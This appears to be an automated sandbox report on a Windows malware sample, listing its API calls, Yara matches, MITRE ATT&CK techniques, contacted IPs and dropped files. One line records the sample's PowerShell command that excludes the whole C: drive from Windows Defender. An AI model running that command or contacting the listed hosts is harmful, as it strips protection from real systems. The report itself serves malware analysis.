Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" ""
Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_0040CF50 AllocateAndInitializeSid,_memset,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,0_2_0040CF50
Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_0041D480 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0041D480
Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: ___crtGetLocaleInfoEx,WSACreateEvent,___crtGetLocaleInfoEx,WSAGetLastError,WSAEventSelect,WSAWaitForMultipleEvents,WSAEnumNetworkEvents,0_2_00421A20
Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: ___crtGetLocaleInfoEx,WSACreateEvent,___crtGetLocaleInfoEx,WSAGetLastError,WSAEventSelect,WSAWaitForMultipleEvents,WSAEnumNetworkEvents,0_2_00421DA0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: GetLocaleInfoA,15_2_0083E5E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_00407FE0 RegCreateKeyExW,RegCloseKey,_memset,GetSystemTime,SystemTimeToFileTime,0_2_00407FE0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C495AD0 LocalAlloc,LoadLibraryW,LocalFree,GetProcAddress,LocalFree,RtlGetVersion,LocalFree,GetUserGeoID,gethostname,gethostbyname,GetComputerNameExW,GetUserNameW,GetTickCount64,LocalFree,5_2_000002684C495AD0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_0083D80C _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,15_2_0083D80C
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C49F6DC HeapCreate,GetVersion,HeapSetInformation,5_2_000002684C49F6DC
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

Source: Yara match | File source: 5.2.svchost.exe.2684c470000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UZPt0hR.exe.95bfd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UZPt0hR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1217083129.0000000000434000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1217880005.0000000000958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2447683081.000002684C4A8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: UZPt0hR.exe PID: 6220, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4900, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match | File source: 5.2.svchost.exe.2684c470000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UZPt0hR.exe.95bfd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UZPt0hR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1217083129.0000000000434000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1217880005.0000000000958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2447683081.000002684C4A8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: UZPt0hR.exe PID: 6220, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4900, type: MEMORYSTR
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_007F92C4 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,__swprintf_l,send,recv,closesocket,closesocket,closesocket,closesocket,15_2_007F92C4
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_007E8C10 htons,bind,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,15_2_007E8C10

MITRE ATT&CK Matrix (columns): Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information1
                    Scripting
                    Valid Accounts2
                    Native API
                    1
                    Scripting
                    1
                    Exploitation for Privilege Escalation
                    1
                    Disable or Modify Tools
                    11
                    Input Capture
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    14
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution
                    2
                    LSASS Driver
                    1
                    Abuse Elevation Control Mechanism
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol11
                    Input Capture
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    DLL Side-Loading
                    2
                    LSASS Driver
                    1
                    Abuse Elevation Control Mechanism
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Obfuscated Files or Information
                    NTDS225
                    System Information Discovery
                    Distributed Component Object ModelInput Capture124
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchd11
                    Registry Run Keys / Startup Folder
                    1
                    Access Token Manipulation
                    2
                    Software Packing
                    LSA Secrets441
                    Security Software Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                    Windows Service
                    1
                    DLL Side-Loading
                    Cached Domain Credentials121
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items311
                    Process Injection
                    11
                    File Deletion
                    DCSync12
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job11
                    Registry Run Keys / Startup Folder
                    1
                    Masquerading
                    Proc Filesystem1
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Modify Registry
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron121
                    Virtualization/Sandbox Evasion
                    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                    Access Token Manipulation
                    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task311
                    Process Injection
                    KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                    Behavior Graph (ID: 1657767, Sample: UZPt0hR.exe, Start date: 06/04/2025, Architecture: WINDOWS, Score: 100)

                    • Start node
                      DNS/IP: grabify.link; edge.geo.kaspersky.com; devbuilds.s.kaspersky-labs.com
                      Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
                      Started: UZPt0hR.exe
                    • UZPt0hR.exe
                      Signatures: Query firmware table information (likely to detect VMs); Contains functionality to inject code into remote processes; Adds a directory exclusion to Windows Defender; 4 other signatures
                      Started: svchost.exe; cmd.exe
                    • svchost.exe
                      DNS/IP: 82.29.67.160, 443, 49694, 49699 NTLGB United Kingdom; grabify.link 104.26.9.202, 443, 49695, 49698 CLOUDFLARENETUS United States; 107.174.192.179, 49692, 80 AS-COLOCROSSINGUS United States
                      Dropped: C:\Users\user\AppData\Local\...\w32tm.exe, PE32+; C:\ProgramData\...\tzutil.exe, PE32+; C:\Users\user\AppData\Local\Temp\...\set.bat, PNG
                      Signatures: Benign windows process drops PE files; Creates autostart registry keys with suspicious names; Deletes itself after installation; Searches for specific processes (likely to inject)
                      Started: tzutil.exe; w32tm.exe; cmd.exe
                    • cmd.exe (child of UZPt0hR.exe)
                      Signatures: Adds a directory exclusion to Windows Defender
                      Started: powershell.exe; conhost.exe
                    • tzutil.exe
                      DNS/IP: 104.168.28.10, 49707, 49710, 49713 AS-COLOCROSSINGUS United States; 127.0.0.1 unknown unknown
                      Dropped: C:\Windows\Temp\K47ZW3T_7928.sys, PE32+
                      Signatures: Query firmware table information (likely to detect VMs); Adds a directory exclusion to Windows Defender; Sample is not signed and drops a device driver; Found direct / indirect Syscall (likely to bypass EDR)
                      Started: powershell.exe; powershell.exe
                    • w32tm.exe
                      DNS/IP: edge.geo.kaspersky.com 4.28.136.57, 443, 49736, 49741 LEVEL3US United States
                      Signatures: Multi AV Scanner detection for dropped file; Creates HTML files with .exe extension (expired dropper behavior); Tries to evade analysis by execution special instruction (VM detection)
                    • cmd.exe (child of svchost.exe)
                      Started: conhost.exe
                    • powershell.exe (child of cmd.exe)
                      Signatures: Loading BitLocker PowerShell Module
                    • powershell.exe (first child of tzutil.exe)
                      Signatures: Loading BitLocker PowerShell Module
                      Started: conhost.exe
                    • powershell.exe (second child of tzutil.exe)
                      Started: conhost.exe

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.